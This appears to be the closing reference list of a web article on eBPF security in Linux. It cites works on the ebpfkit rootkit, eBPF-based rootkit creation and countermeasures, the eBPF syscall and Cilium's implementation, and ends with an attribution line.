- Reverse Engineering Ebpfkit Rootkit With BlackBerry's Enhanced IDA Processor Tool
- Creating and countering the next generation of Linux rootkits using eBPF
- eBPF Syscall
- Cilium eBPF implementation mechanism source code analysis
- ebpfkit is a rootkit powered by eBPF
Original article by SnowFlake, if reproduced, please credit https://cncso.com/en/linux-ebpf-attack-and-defense-and-security-html